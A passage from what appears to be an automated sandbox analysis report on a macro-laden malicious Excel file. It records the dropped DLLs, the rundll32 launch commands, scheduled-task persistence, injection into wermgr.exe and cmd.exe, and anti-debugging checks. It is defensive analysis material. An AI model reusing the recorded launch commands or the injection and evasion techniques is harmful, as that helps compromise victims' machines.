Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180008444	9_2_0000000180008444
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018001C4C8	9_2_000000018001C4C8
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180001574	9_2_0000000180001574
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180003594	9_2_0000000180003594
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800076B8	9_2_00000001800076B8
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800026C0	9_2_00000001800026C0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018003B6C4	9_2_000000018003B6C4
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180023780	9_2_0000000180023780
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180036828	9_2_0000000180036828
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180019860	9_2_0000000180019860
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180025868	9_2_0000000180025868
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800188B0	9_2_00000001800188B0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800018CC	9_2_00000001800018CC
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018000E8EC	9_2_000000018000E8EC
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800158F8	9_2_00000001800158F8
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018003396C	9_2_000000018003396C
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180002A24	9_2_0000000180002A24
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018008FC84	9_2_000000018008FC84
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180014D24	9_2_0000000180014D24
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180002D88	9_2_0000000180002D88
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180007D89	9_2_0000000180007D89
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180083E30	9_2_0000000180083E30
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018008BE3C	9_2_000000018008BE3C
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180024EC0	9_2_0000000180024EC0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180003F38	9_2_0000000180003F38
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018000BFE0	9_2_000000018000BFE0

Document contains embedded VBA macros

Source: SecuriteInfo.com.Heur.31681.xls

OLE indicator, VBA macros: true

Yara signature match

Source: SecuriteInfo.com.Heur.31681.xls, type: SAMPLE

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLS@14/16@5/5

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006E420 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,		5_2_0006E420
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018000B848 LookupPrivilegeValueA,AdjustTokenPrivileges,		9_2_000000018000B848

Source: C:\Windows\System32\cmd.exe

Code function: 9_2_000000018000BB84 CreateToolhelp32Snapshot,Process32First,Process32Next,StrStrIA,

9_2_000000018000BB84

Source: C:\Windows\System32\wermgr.exe

Code function: 5_2_0006BA20 CoCreateInstance,

5_2_0006BA20

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT

Jump to behavior

Source: C:\Windows\System32\wermgr.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\{79ED1AB7-4F83-DE32-0BD1-4533166B87A7}

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD6CE.tmp

Jump to behavior

Source: SecuriteInfo.com.Heur.31681.xls

OLE indicator, Workbook stream: true

Source: C:\Windows\System32\wermgr.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW

Source: SecuriteInfo.com.Heur.31681.xls

ReversingLabs: Detection: 12%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {A9986821-F5E8-4178-8C7A-712EEA14850B} S-1-5-18:NT AUTHORITY\System:Service:
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW	Jump to behavior

Source: C:\Windows\System32\taskeng.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E821032 StartW,VirtualAlloc,VirtualFree,LoadLibraryA,GetProcAddress,MessageBoxA,SendMessageA,SetTimer,KillTimer,

4_2_6E821032

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00290B40 push dword ptr [edx+14h]; ret	4_2_00290C4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00290205 push edx; iretd	4_2_00290206
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00290AD8 push dword ptr [edx+14h]; ret	4_2_00290C4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00290B10 push dword ptr [edx+14h]; ret	4_2_00290C4D
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00086E83 push es; ret	5_2_00086F30
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018004047A push ebp; ret	9_2_000000018004047B
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018003259D push edi; ret	9_2_000000018003259F

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\fndskfnds.dfm			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\fndskfnds.dfm

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\fndskfnds.dfm

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\fndskfnds.dfm

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Source: C:\Windows\System32\wermgr.exe

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\System32\wermgr.exe

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\System32\wermgr.exe

Code function: 5_2_00067D50 rdtsc

5_2_00067D50

Contains functionality to query network adapater information

Source: C:\Windows\System32\wermgr.exe

Code function: GetAdaptersInfo,

5_2_00073460

Found dropped PE file which has not been started or loaded

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\taskeng.exe TID: 2948	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 2228	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 2960	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00062E60 FindFirstFileW,FindNextFileW,		5_2_00062E60
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00063B00 FindFirstFileW,		5_2_00063B00

Source: C:\Windows\System32\cmd.exe

Code function: 9_2_00000001800225AC GetSystemInfo,

9_2_00000001800225AC

Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 43489			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\System32\wermgr.exe

Code function: 5_2_00067D50 rdtsc

5_2_00067D50

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\System32\wermgr.exe

Code function: 5_2_00072AD0 LdrLoadDll,

5_2_00072AD0

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E821032 StartW,VirtualAlloc,VirtualFree,LoadLibraryA,GetProcAddress,MessageBoxA,SendMessageA,SetTimer,KillTimer,

4_2_6E821032

Enables debug privileges

Source: C:\Windows\System32\cmd.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\wermgr.exe

Code function: 5_2_0006F600 SleepEx,SetTimer,RtlAddVectoredExceptionHandler,

5_2_0006F600

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe

Memory allocated: C:\Windows\System32\wermgr.exe base: 60000 protect: page execute and read and write

Jump to behavior

Hijacks the control flow in another process

Source: C:\Windows\System32\wermgr.exe	Memory written: PID: 3068 base: 1800B5000 value: FF			Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: PID: 1688 base: 180079000 value: FF			Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: 60000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: FFF593F8	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 49D790B4	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 140000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 140000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
